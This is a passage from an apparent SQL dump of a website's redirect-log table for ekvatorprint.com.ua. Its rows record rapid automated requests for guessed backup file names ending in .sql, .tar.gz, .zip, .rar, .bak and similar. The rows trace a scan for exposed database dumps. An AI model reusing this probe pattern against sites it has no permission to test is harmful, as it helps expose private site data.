00:00:00',301),(22523,'https://ekvatorprint.com.ua/at.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:55','0000-00-00 00:00:00',301),(22524,'https://ekvatorprint.com.ua/at.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:55','0000-00-00 00:00:00',301),(22525,'https://ekvatorprint.com.ua/at.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:55','0000-00-00 00:00:00',301),(22526,'https://ekvatorprint.com.ua/at.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:55','0000-00-00 00:00:00',301),(22527,'https://ekvatorprint.com.ua/at.7z',NULL,'','',1,0,'2022-03-23 11:23:56','0000-00-00 00:00:00',301),(22528,'https://ekvatorprint.com.ua/at.gz',NULL,'','',1,0,'2022-03-23 11:23:56','0000-00-00 00:00:00',301),(22529,'https://ekvatorprint.com.ua/ato.sql',NULL,'','',1,0,'2022-03-23 11:23:57','0000-00-00 00:00:00',301),(22530,'https://ekvatorprint.com.ua/ato.tar',NULL,'','',1,0,'2022-03-23 11:23:57','0000-00-00 00:00:00',301),(22531,'https://ekvatorprint.com.ua/ato.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:57','0000-00-00 00:00:00',301),(22532,'https://ekvatorprint.com.ua/ato.bz2',NULL,'','',1,0,'2022-03-23 11:23:57','0000-00-00 00:00:00',301),(22533,'https://ekvatorprint.com.ua/ato.rar',NULL,'','',2,0,'2022-03-23 11:23:57','0000-00-00 00:00:00',301),(22534,'https://ekvatorprint.com.ua/ato.bak',NULL,'','',1,0,'2022-03-23 11:23:58','0000-00-00 00:00:00',301),(22535,'https://ekvatorprint.com.ua/ato.zip',NULL,'','',1,0,'2022-03-23 11:23:58','0000-00-00 00:00:00',301),(22536,'https://ekvatorprint.com.ua/ato.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:58','0000-00-00 00:00:00',301),(22537,'https://ekvatorprint.com.ua/ato.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:59','0000-00-00 00:00:00',301),(22538,'https://ekvatorprint.com.ua/ato.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:59','0000-00-00 00:00:00',301),(22539,'https://ekvatorprint.com.ua/ato.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:59','0000-00-00 00:00:00',301),(22540,'https://ekvatorprint.com.ua/ato.7z',NULL,'','',1,0,'2022-03-23 11:24:00','0000-00-00 00:00:00',301),(22541,'https://ekvatorprint.com.ua/ato.gz',NULL,'','',1,0,'2022-03-23 11:24:00','0000-00-00 00:00:00',301),(22542,'https://ekvatorprint.com.ua/ator.sql',NULL,'','',1,0,'2022-03-23 11:24:00','0000-00-00 00:00:00',301),(22543,'https://ekvatorprint.com.ua/ator.tar',NULL,'','',1,0,'2022-03-23 11:24:00','0000-00-00 00:00:00',301),(22544,'https://ekvatorprint.com.ua/ator.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:01','0000-00-00 00:00:00',301),(22545,'https://ekvatorprint.com.ua/ator.bz2',NULL,'','',1,0,'2022-03-23 11:24:01','0000-00-00 00:00:00',301),(22546,'https://ekvatorprint.com.ua/ator.rar',NULL,'','',2,0,'2022-03-23 11:24:01','0000-00-00 00:00:00',301),(22547,'https://ekvatorprint.com.ua/ator.bak',NULL,'','',1,0,'2022-03-23 11:24:02','0000-00-00 00:00:00',301),(22548,'https://ekvatorprint.com.ua/ator.zip',NULL,'','',1,0,'2022-03-23 11:24:02','0000-00-00 00:00:00',301),(22549,'https://ekvatorprint.com.ua/ator.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:02','0000-00-00 00:00:00',301),(22550,'https://ekvatorprint.com.ua/ator.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:02','0000-00-00 00:00:00',301),(22551,'https://ekvatorprint.com.ua/ator.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:03','0000-00-00 00:00:00',301),(22552,'https://ekvatorprint.com.ua/ator.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:03','0000-00-00 00:00:00',301),(22553,'https://ekvatorprint.com.ua/ator.7z',NULL,'','',1,0,'2022-03-23 11:24:03','0000-00-00 00:00:00',301),(22554,'https://ekvatorprint.com.ua/ator.gz',NULL,'','',1,0,'2022-03-23 11:24:04','0000-00-00 00:00:00',301),(22555,'https://ekvatorprint.com.ua/c.sql',NULL,'','',1,0,'2022-03-23 11:24:04','0000-00-00 00:00:00',301),(22556,'https://ekvatorprint.com.ua/c.tar',NULL,'','',1,0,'2022-03-23 11:24:04','0000-00-00 00:00:00',301),(22557,'https://ekvatorprint.com.ua/c.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:05','0000-00-00 00:00:00',301),(22558,'https://ekvatorprint.com.ua/c.bz2',NULL,'','',1,0,'2022-03-23 11:24:05','0000-00-00 00:00:00',301),(22559,'https://ekvatorprint.com.ua/c.rar',NULL,'','',2,0,'2022-03-23 11:24:05','0000-00-00 00:00:00',301),(22560,'https://ekvatorprint.com.ua/c.bak',NULL,'','',1,0,'2022-03-23 11:24:05','0000-00-00 00:00:00',301),(22561,'https://ekvatorprint.com.ua/c.zip',NULL,'','',1,0,'2022-03-23 11:24:06','0000-00-00 00:00:00',301),(22562,'https://ekvatorprint.com.ua/c.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:06','0000-00-00 00:00:00',301),(22563,'https://ekvatorprint.com.ua/c.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:06','0000-00-00 00:00:00',301),(22564,'https://ekvatorprint.com.ua/c.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:06','0000-00-00 00:00:00',301),(22565,'https://ekvatorprint.com.ua/c.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:07','0000-00-00 00:00:00',301),(22566,'https://ekvatorprint.com.ua/c.7z',NULL,'','',1,0,'2022-03-23 11:24:07','0000-00-00 00:00:00',301),(22567,'https://ekvatorprint.com.ua/c.gz',NULL,'','',1,0,'2022-03-23 11:24:07','0000-00-00 00:00:00',301),(22568,'https://ekvatorprint.com.ua/co.sql',NULL,'','',1,0,'2022-03-23 11:24:08','0000-00-00 00:00:00',301),(22569,'https://ekvatorprint.com.ua/co.tar',NULL,'','',1,0,'2022-03-23 11:24:08','0000-00-00 00:00:00',301),(22570,'https://ekvatorprint.com.ua/co.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:08','0000-00-00 00:00:00',301),(22571,'https://ekvatorprint.com.ua/co.bz2',NULL,'','',1,0,'2022-03-23 11:24:09','0000-00-00 00:00:00',301),(22572,'https://ekvatorprint.com.ua/co.rar',NULL,'','',2,0,'2022-03-23 11:24:09','0000-00-00 00:00:00',301),(22573,'https://ekvatorprint.com.ua/co.bak',NULL,'','',1,0,'2022-03-23 11:24:10','0000-00-00 00:00:00',301),(22574,'https://ekvatorprint.com.ua/co.zip',NULL,'','',1,0,'2022-03-23 11:24:10','0000-00-00 00:00:00',301),(22575,'https://ekvatorprint.com.ua/co.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:10','0000-00-00 00:00:00',301),(22576,'https://ekvatorprint.com.ua/co.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:10','0000-00-00 00:00:00',301),(22577,'https://ekvatorprint.com.ua/co.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:11','0000-00-00 00:00:00',301),(22578,'https://ekvatorprint.com.ua/co.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:11','0000-00-00 00:00:00',301),(22579,'https://ekvatorprint.com.ua/co.7z',NULL,'','',1,0,'2022-03-23 11:24:11','0000-00-00 00:00:00',301),(22580,'https://ekvatorprint.com.ua/co.gz',NULL,'','',1,0,'2022-03-23 11:24:12','0000-00-00 00:00:00',301),(22581,'https://ekvatorprint.com.ua/com.tar',NULL,'','',1,0,'2022-03-23 11:24:12','0000-00-00 00:00:00',301),(22582,'https://ekvatorprint.com.ua/com.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:12','0000-00-00 00:00:00',301),(22583,'https://ekvatorprint.com.ua/com.bz2',NULL,'','',1,0,'2022-03-23 11:24:13','0000-00-00 00:00:00',301),(22584,'https://ekvatorprint.com.ua/com.rar',NULL,'','',2,0,'2022-03-23 11:24:13','0000-00-00 00:00:00',301),(22585,'https://ekvatorprint.com.ua/com.bak',NULL,'','',1,0,'2022-03-23 11:24:13','0000-00-00 00:00:00',301),(22586,'https://ekvatorprint.com.ua/com.zip',NULL,'','',1,0,'2022-03-23 11:24:14','0000-00-00 00:00:00',301),(22587,'https://ekvatorprint.com.ua/com.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:14','0000-00-00 00:00:00',301),(22588,'https://ekvatorprint.com.ua/com.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:14','0000-00-00 00:00:00',301),(22589,'https://ekvatorprint.com.ua/com.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:15','0000-00-00 00:00:00',301),(22590,'https://ekvatorprint.com.ua/com.7z',NULL,'','',1,0,'2022-03-23 11:24:15','0000-00-00 00:00:00',301),(22591,'https://ekvatorprint.com.ua/com.gz',NULL,'','',1,0,'2022-03-23 11:24:15','0000-00-00 00:00:00',301),(22592,'https://ekvatorprint.com.ua/h.sql',NULL,'','',1,0,'2022-03-23 11:24:20','0000-00-00 00:00:00',301),(22593,'https://ekvatorprint.com.ua/h.tar',NULL,'','',1,0,'2022-03-23 11:24:20','0000-00-00 00:00:00',301),(22594,'https://ekvatorprint.com.ua/h.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:20','0000-00-00 00:00:00',301),(22595,'https://ekvatorprint.com.ua/h.bz2',NULL,'','',1,0,'2022-03-23 11:24:21','0000-00-00 00:00:00',301),(22596,'https://ekvatorprint.com.ua/h.rar',NULL,'','',2,0,'2022-03-23 11:24:21','0000-00-00 00:00:00',301),(22597,'https://ekvatorprint.com.ua/h.bak',NULL,'','',1,0,'2022-03-23 11:24:21','0000-00-00 00:00:00',301),(22598,'https://ekvatorprint.com.ua/h.zip',NULL,'','',1,0,'2022-03-23 11:24:22','0000-00-00 00:00:00',301),(22599,'https://ekvatorprint.com.ua/h.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:22','0000-00-00 00:00:00',301),(22600,'https://ekvatorprint.com.ua/h.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:22','0000-00-00 00:00:00',301),(22601,'https://ekvatorprint.com.ua/h.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:23','0000-00-00 00:00:00',301),(22602,'https://ekvatorprint.com.ua/h.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:23','0000-00-00 00:00:00',301),(22603,'https://ekvatorprint.com.ua/h.7z',NULL,'','',1,0,'2022-03-23 11:24:23','0000-00-00 00:00:00',301),(22604,'https://ekvatorprint.com.ua/h.gz',NULL,'','',1,0,'2022-03-23 11:24:24','0000-00-00 00:00:00',301),(22605,'https://ekvatorprint.com.ua/ht.sql',NULL,'','',1,0,'2022-03-23 11:24:24','0000-00-00 00:00:00',301),(22606,'https://ekvatorprint.com.ua/ht.tar',NULL,'','',1,0,'2022-03-23 11:24:24','0000-00-00 00:00:00',301),(22607,'https://ekvatorprint.com.ua/ht.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:25','0000-00-00 00:00:00',301),(22608,'https://ekvatorprint.com.ua/ht.bz2',NULL,'','',1,0,'2022-03-23 11:24:25','0000-00-00 00:00:00',301),(22609,'https://ekvatorprint.com.ua/ht.rar',NULL,'','',2,0,'2022-03-23 11:24:25','0000-00-00 00:00:00',301),(22610,'https://ekvatorprint.com.ua/ht.bak',NULL,'','',1,0,'2022-03-23 11:24:25','0000-00-00 00:00:00',301),(22611,'https://ekvatorprint.com.ua/ht.zip',NULL,'','',1,0,'2022-03-23 11:24:26','0000-00-00 00:00:00',301),(22612,'https://ekvatorprint.com.ua/ht.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:26','0000-00-00 00:00:00',301),(22613,'https://ekvatorprint.com.ua/ht.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:26','0000-00-00 00:00:00',301),(22614,'https://ekvatorprint.com.ua/ht.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:27','0000-00-00 00:00:00',301),(22615,'https://ekvatorprint.com.ua/ht.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:27','0000-00-00 00:00:00',301),(22616,'https://ekvatorprint.com.ua/ht.7z',NULL,'','',1,0,'2022-03-23 11:24:27','0000-00-00 00:00:00',301),(22617,'https://ekvatorprint.com.ua/ht.gz',NULL,'','',1,0,'2022-03-23 11:24:28','0000-00-00 00:00:00',301),(22618,'https://ekvatorprint.com.ua/i.sql',NULL,'','',2,0,'2022-03-23 11:24:28','0000-00-00 00:00:00',301),(22619,'https://ekvatorprint.com.ua/i.tar',NULL,'','',2,0,'2022-03-23 11:24:28','0000-00-00 00:00:00',301),(22620,'https://ekvatorprint.com.ua/i.tar.gz',NULL,'','',2,0,'2022-03-23 11:24:28','0000-00-00 00:00:00',301),(22621,'https://ekvatorprint.com.ua/i.bz2',NULL,'','',2,0,'2022-03-23 11:24:29','0000-00-00 00:00:00',301),(22622,'https://ekvatorprint.com.ua/i.rar',NULL,'','',4,0,'2022-03-23 11:24:29','0000-00-00 00:00:00',301),(22623,'https://ekvatorprint.com.ua/i.bak',NULL,'','',2,0,'2022-03-23 11:24:29','0000-00-00 00:00:00',301),(22624,'https://ekvatorprint.com.ua/i.zip',NULL,'','',2,0,'2022-03-23 11:24:29','0000-00-00 00:00:00',301),(22625,'https://ekvatorprint.com.ua/i.sql.gz',NULL,'','',2,0,'2022-03-23 11:24:30','0000-00-00 00:00:00',301),(22626,'https://ekvatorprint.com.ua/i.sql.zip',NULL,'','',2,0,'2022-03-23 11:24:30','0000-00-00 00:00:00',301),(22627,'https://ekvatorprint.com.ua/i.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:24:30','0000-00-00 00:00:00',301),(22628,'https://ekvatorprint.com.ua/i.sql.tar',NULL,'','',2,0,'2022-03-23 11:24:31','0000-00-00 00:00:00',301),(22629,'https://ekvatorprint.com.ua/i.7z',NULL,'','',2,0,'2022-03-23 11:24:31','0000-00-00 00:00:00',301),(22630,'https://ekvatorprint.com.ua/i.gz',NULL,'','',2,0,'2022-03-23 11:24:31','0000-00-00 00:00:00',301),(22631,'https://ekvatorprint.com.ua/in.sql',NULL,'','',1,0,'2022-03-23 11:24:35','0000-00-00 00:00:00',301),(22632,'https://ekvatorprint.com.ua/in.tar',NULL,'','',1,0,'2022-03-23 11:24:35','0000-00-00 00:00:00',301),(22633,'https://ekvatorprint.com.ua/in.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:36','0000-00-00 00:00:00',301),(22634,'https://ekvatorprint.com.ua/in.bz2',NULL,'','',1,0,'2022-03-23 11:24:36','0000-00-00 00:00:00',301),(22635,'https://ekvatorprint.com.ua/in.rar',NULL,'','',2,0,'2022-03-23 11:24:36','0000-00-00 00:00:00',301),(22636,'https://ekvatorprint.com.ua/in.bak',NULL,'','',1,0,'2022-03-23 11:24:37','0000-00-00 00:00:00',301),(22637,'https://ekvatorprint.com.ua/in.zip',NULL,'','',1,0,'2022-03-23 11:24:37','0000-00-00 00:00:00',301),(22638,'https://ekvatorprint.com.ua/in.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:37','0000-00-00 00:00:00',301),(22639,'https://ekvatorprint.com.ua/in.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:37','0000-00-00 00:00:00',301),(22640,'https://ekvatorprint.com.ua/in.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:38','0000-00-00 00:00:00',301),(22641,'https://ekvatorprint.com.ua/in.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:38','0000-00-00 00:00:00',301),(22642,'https://ekvatorprint.com.ua/in.7z',NULL,'','',1,0,'2022-03-23 11:24:38','0000-00-00 00:00:00',301),(22643,'https://ekvatorprint.com.ua/in.gz',NULL,'','',1,0,'2022-03-23 11:24:39','0000-00-00 00:00:00',301),(22644,'https://ekvatorprint.com.ua/int.sql',NULL,'','',2,0,'2022-03-23 11:24:39','0000-00-00 00:00:00',301),(22645,'https://ekvatorprint.com.ua/int.tar',NULL,'','',2,0,'2022-03-23 11:24:39','0000-00-00 00:00:00',301),(22646,'https://ekvatorprint.com.ua/int.tar.gz',NULL,'','',2,0,'2022-03-23 11:24:39','0000-00-00 00:00:00',301),(22647,'https://ekvatorprint.com.ua/int.bz2',NULL,'','',2,0,'2022-03-23 11:24:40','0000-00-00 00:00:00',301),(22648,'https://ekvatorprint.com.ua/int.rar',NULL,'','',4,0,'2022-03-23 11:24:40','0000-00-00 00:00:00',301),(22649,'https://ekvatorprint.com.ua/int.bak',NULL,'','',2,0,'2022-03-23 11:24:40','0000-00-00 00:00:00',301),(22650,'https://ekvatorprint.com.ua/int.zip',NULL,'','',2,0,'2022-03-23 11:24:40','0000-00-00 00:00:00',301),(22651,'https://ekvatorprint.com.ua/int.sql.gz',NULL,'','',2,0,'2022-03-23 11:24:41','0000-00-00 00:00:00',301),(22652,'https://ekvatorprint.com.ua/int.sql.zip',NULL,'','',2,0,'2022-03-23 11:24:41','0000-00-00 00:00:00',301),(22653,'https://ekvatorprint.com.ua/int.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:24:41','0000-00-00 00:00:00',301),(22654,'https://ekvatorprint.com.ua/int.sql.tar',NULL,'','',2,0,'2022-03-23 11:24:42','0000-00-00 00:00:00',301),(22655,'https://ekvatorprint.com.ua/int.7z',NULL,'','',2,0,'2022-03-23 11:24:42','0000-00-00 00:00:00',301),(22656,'https://ekvatorprint.com.ua/int.gz',NULL,'','',2,0,'2022-03-23 11:24:42','0000-00-00 00:00:00',301),(22657,'https://ekvatorprint.com.ua/k.sql',NULL,'','',1,0,'2022-03-23 11:24:46','0000-00-00 00:00:00',301),(22658,'https://ekvatorprint.com.ua/k.tar',NULL,'','',1,0,'2022-03-23 11:24:46','0000-00-00 00:00:00',301),(22659,'https://ekvatorprint.com.ua/k.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:46','0000-00-00 00:00:00',301),(22660,'https://ekvatorprint.com.ua/k.bz2',NULL,'','',1,0,'2022-03-23 11:24:47','0000-00-00 00:00:00',301),(22661,'https://ekvatorprint.com.ua/k.rar',NULL,'','',2,0,'2022-03-23 11:24:47','0000-00-00 00:00:00',301),(22662,'https://ekvatorprint.com.ua/k.bak',NULL,'','',1,0,'2022-03-23 11:24:47','0000-00-00 00:00:00',301),(22663,'https://ekvatorprint.com.ua/k.zip',NULL,'','',1,0,'2022-03-23 11:24:47','0000-00-00 00:00:00',301),(22664,'https://ekvatorprint.com.ua/k.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:48','0000-00-00 00:00:00',301),(22665,'https://ekvatorprint.com.ua/k.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:48','0000-00-00 00:00:00',301),(22666,'https://ekvatorprint.com.ua/k.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:48','0000-00-00 00:00:00',301),(22667,'https://ekvatorprint.com.ua/k.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:48','0000-00-00 00:00:00',301),(22668,'https://ekvatorprint.com.ua/k.7z',NULL,'','',1,0,'2022-03-23 11:24:49','0000-00-00 00:00:00',301),(22669,'https://ekvatorprint.com.ua/k.gz',NULL,'','',1,0,'2022-03-23 11:24:49','0000-00-00 00:00:00',301),(22670,'https://ekvatorprint.com.ua/kv.sql',NULL,'','',1,0,'2022-03-23 11:24:49','0000-00-00 00:00:00',301),(22671,'https://ekvatorprint.com.ua/kv.tar',NULL,'','',1,0,'2022-03-23 11:24:50','0000-00-00 00:00:00',301),(22672,'https://ekvatorprint.com.ua/kv.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:50','0000-00-00 00:00:00',301),(22673,'https://ekvatorprint.com.ua/kv.bz2',NULL,'','',1,0,'2022-03-23 11:24:50','0000-00-00 00:00:00',301),(22674,'https://ekvatorprint.com.ua/kv.rar',NULL,'','',2,0,'2022-03-23 11:24:50','0000-00-00 00:00:00',301),(22675,'https://ekvatorprint.com.ua/kv.bak',NULL,'','',1,0,'2022-03-23 11:24:51','0000-00-00 00:00:00',301),(22676,'https://ekvatorprint.com.ua/kv.zip',NULL,'','',1,0,'2022-03-23 11:24:51','0000-00-00 00:00:00',301),(22677,'https://ekvatorprint.com.ua/kv.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:51','0000-00-00 00:00:00',301),(22678,'https://ekvatorprint.com.ua/kv.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:51','0000-00-00 00:00:00',301),(22679,'https://ekvatorprint.com.ua/kv.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:52','0000-00-00 00:00:00',301),(22680,'https://ekvatorprint.com.ua/kv.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:52','0000-00-00 00:00:00',301),(22681,'https://ekvatorprint.com.ua/kv.7z',NULL,'','',1,0,'2022-03-23 11:24:52','0000-00-00 00:00:00',301),(22682,'https://ekvatorprint.com.ua/kv.gz',NULL,'','',1,0,'2022-03-23 11:24:53','0000-00-00 00:00:00',301),(22683,'https://ekvatorprint.com.ua/kva.sql',NULL,'','',1,0,'2022-03-23 11:24:53','0000-00-00 00:00:00',301),(22684,'https://ekvatorprint.com.ua/kva.tar',NULL,'','',1,0,'2022-03-23 11:24:53','0000-00-00 00:00:00',301),(22685,'https://ekvatorprint.com.ua/kva.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:53','0000-00-00 00:00:00',301),(22686,'https://ekvatorprint.com.ua/kva.bz2',NULL,'','',1,0,'2022-03-23 11:24:54','0000-00-00 00:00:00',301),(22687,'https://ekvatorprint.com.ua/kva.rar',NULL,'','',2,0,'2022-03-23 11:24:54','0000-00-00 00:00:00',301),(22688,'https://ekvatorprint.com.ua/kva.bak',NULL,'','',1,0,'2022-03-23 11:24:54','0000-00-00 00:00:00',301),(22689,'https://ekvatorprint.com.ua/kva.zip',NULL,'','',1,0,'2022-03-23 11:24:54','0000-00-00 00:00:00',301),(22690,'https://ekvatorprint.com.ua/kva.sql.gz',NULL,'','',1,0,'2022-03-23 11:24:55','0000-00-00 00:00:00',301),(22691,'https://ekvatorprint.com.ua/kva.sql.zip',NULL,'','',1,0,'2022-03-23 11:24:55','0000-00-00 00:00:00',301),(22692,'https://ekvatorprint.com.ua/kva.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:24:55','0000-00-00 00:00:00',301),(22693,'https://ekvatorprint.com.ua/kva.sql.tar',NULL,'','',1,0,'2022-03-23 11:24:55','0000-00-00 00:00:00',301),(22694,'https://ekvatorprint.com.ua/kva.7z',NULL,'','',1,0,'2022-03-23 11:24:56','0000-00-00 00:00:00',301),(22695,'https://ekvatorprint.com.ua/kva.gz',NULL,'','',1,0,'2022-03-23 11:24:56','0000-00-00 00:00:00',301),(22696,'https://ekvatorprint.com.ua/m.sql',NULL,'','',3,0,'2022-03-23 11:24:56','0000-00-00 00:00:00',301),(22697,'https://ekvatorprint.com.ua/m.tar',NULL,'','',3,0,'2022-03-23 11:24:57','0000-00-00 00:00:00',301),(22698,'https://ekvatorprint.com.ua/m.tar.gz',NULL,'','',3,0,'2022-03-23 11:24:57','0000-00-00 00:00:00',301),(22699,'https://ekvatorprint.com.ua/m.bz2',NULL,'','',3,0,'2022-03-23 11:24:57','0000-00-00 00:00:00',301),(22700,'https://ekvatorprint.com.ua/m.rar',NULL,'','',6,0,'2022-03-23 11:24:57','0000-00-00 00:00:00',301),(22701,'https://ekvatorprint.com.ua/m.bak',NULL,'','',3,0,'2022-03-23 11:24:58','0000-00-00 00:00:00',301),(22702,'https://ekvatorprint.com.ua/m.zip',NULL,'','',3,0,'2022-03-23 11:24:58','0000-00-00 00:00:00',301),(22703,'https://ekvatorprint.com.ua/m.sql.gz',NULL,'','',3,0,'2022-03-23 11:24:58','0000-00-00 00:00:00',301),(22704,'https://ekvatorprint.com.ua/m.sql.zip',NULL,'','',3,0,'2022-03-23 11:24:58','0000-00-00 00:00:00',301),(22705,'https://ekvatorprint.com.ua/m.sql.tar.gz',NULL,'','',3,0,'2022-03-23 11:24:58','0000-00-00 00:00:00',301),(22706,'https://ekvatorprint.com.ua/m.sql.tar',NULL,'','',3,0,'2022-03-23 11:24:59','0000-00-00 00:00:00',301),(22707,'https://ekvatorprint.com.ua/m.7z',NULL,'','',3,0,'2022-03-23 11:24:59','0000-00-00 00:00:00',301),(22708,'https://ekvatorprint.com.ua/m.gz',NULL,'','',3,0,'2022-03-23 11:24:59','0000-00-00 00:00:00',301),(22709,'https://ekvatorprint.com.ua/n.sql',NULL,'','',1,0,'2022-03-23 11:25:09','0000-00-00 00:00:00',301),(22710,'https://ekvatorprint.com.ua/n.tar',NULL,'','',1,0,'2022-03-23 11:25:09','0000-00-00 00:00:00',301),(22711,'https://ekvatorprint.com.ua/n.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:09','0000-00-00 00:00:00',301),(22712,'https://ekvatorprint.com.ua/n.bz2',NULL,'','',1,0,'2022-03-23 11:25:10','0000-00-00 00:00:00',301),(22713,'https://ekvatorprint.com.ua/n.rar',NULL,'','',2,0,'2022-03-23 11:25:10','0000-00-00 00:00:00',301),(22714,'https://ekvatorprint.com.ua/n.bak',NULL,'','',1,0,'2022-03-23 11:25:10','0000-00-00 00:00:00',301),(22715,'https://ekvatorprint.com.ua/n.zip',NULL,'','',1,0,'2022-03-23 11:25:10','0000-00-00 00:00:00',301),(22716,'https://ekvatorprint.com.ua/n.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:11','0000-00-00 00:00:00',301),(22717,'https://ekvatorprint.com.ua/n.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:11','0000-00-00 00:00:00',301),(22718,'https://ekvatorprint.com.ua/n.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:11','0000-00-00 00:00:00',301),(22719,'https://ekvatorprint.com.ua/n.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:12','0000-00-00 00:00:00',301),(22720,'https://ekvatorprint.com.ua/n.7z',NULL,'','',1,0,'2022-03-23 11:25:12','0000-00-00 00:00:00',301),(22721,'https://ekvatorprint.com.ua/n.gz',NULL,'','',1,0,'2022-03-23 11:25:12','0000-00-00 00:00:00',301),(22722,'https://ekvatorprint.com.ua/nt.sql',NULL,'','',1,0,'2022-03-23 11:25:13','0000-00-00 00:00:00',301),(22723,'https://ekvatorprint.com.ua/nt.tar',NULL,'','',1,0,'2022-03-23 11:25:13','0000-00-00 00:00:00',301),(22724,'https://ekvatorprint.com.ua/nt.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:13','0000-00-00 00:00:00',301),(22725,'https://ekvatorprint.com.ua/nt.bz2',NULL,'','',1,0,'2022-03-23 11:25:13','0000-00-00 00:00:00',301),(22726,'https://ekvatorprint.com.ua/nt.rar',NULL,'','',2,0,'2022-03-23 11:25:14','0000-00-00 00:00:00',301),(22727,'https://ekvatorprint.com.ua/nt.bak',NULL,'','',1,0,'2022-03-23 11:25:14','0000-00-00 00:00:00',301),(22728,'https://ekvatorprint.com.ua/nt.zip',NULL,'','',1,0,'2022-03-23 11:25:14','0000-00-00 00:00:00',301),(22729,'https://ekvatorprint.com.ua/nt.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:14','0000-00-00 00:00:00',301),(22730,'https://ekvatorprint.com.ua/nt.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:15','0000-00-00 00:00:00',301),(22731,'https://ekvatorprint.com.ua/nt.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:15','0000-00-00 00:00:00',301),(22732,'https://ekvatorprint.com.ua/nt.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:15','0000-00-00 00:00:00',301),(22733,'https://ekvatorprint.com.ua/nt.7z',NULL,'','',1,0,'2022-03-23 11:25:16','0000-00-00 00:00:00',301),(22734,'https://ekvatorprint.com.ua/nt.gz',NULL,'','',1,0,'2022-03-23 11:25:16','0000-00-00 00:00:00',301),(22735,'https://ekvatorprint.com.ua/o.sql',NULL,'','',2,0,'2022-03-23 11:25:16','0000-00-00 00:00:00',301),(22736,'https://ekvatorprint.com.ua/o.tar',NULL,'','',2,0,'2022-03-23 11:25:17','0000-00-00 00:00:00',301),(22737,'https://ekvatorprint.com.ua/o.tar.gz',NULL,'','',2,0,'2022-03-23 11:25:17','0000-00-00 00:00:00',301),(22738,'https://ekvatorprint.com.ua/o.bz2',NULL,'','',2,0,'2022-03-23 11:25:17','0000-00-00 00:00:00',301),(22739,'https://ekvatorprint.com.ua/o.rar',NULL,'','',4,0,'2022-03-23 11:25:17','0000-00-00 00:00:00',301),(22740,'https://ekvatorprint.com.ua/o.bak',NULL,'','',2,0,'2022-03-23 11:25:18','0000-00-00 00:00:00',301),(22741,'https://ekvatorprint.com.ua/o.zip',NULL,'','',2,0,'2022-03-23 11:25:18','0000-00-00 00:00:00',301),(22742,'https://ekvatorprint.com.ua/o.sql.gz',NULL,'','',2,0,'2022-03-23 11:25:18','0000-00-00 00:00:00',301),(22743,'https://ekvatorprint.com.ua/o.sql.zip',NULL,'','',2,0,'2022-03-23 11:25:19','0000-00-00 00:00:00',301),(22744,'https://ekvatorprint.com.ua/o.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:25:19','0000-00-00 00:00:00',301),(22745,'https://ekvatorprint.com.ua/o.sql.tar',NULL,'','',2,0,'2022-03-23 11:25:19','0000-00-00 00:00:00',301),(22746,'https://ekvatorprint.com.ua/o.7z',NULL,'','',2,0,'2022-03-23 11:25:20','0000-00-00 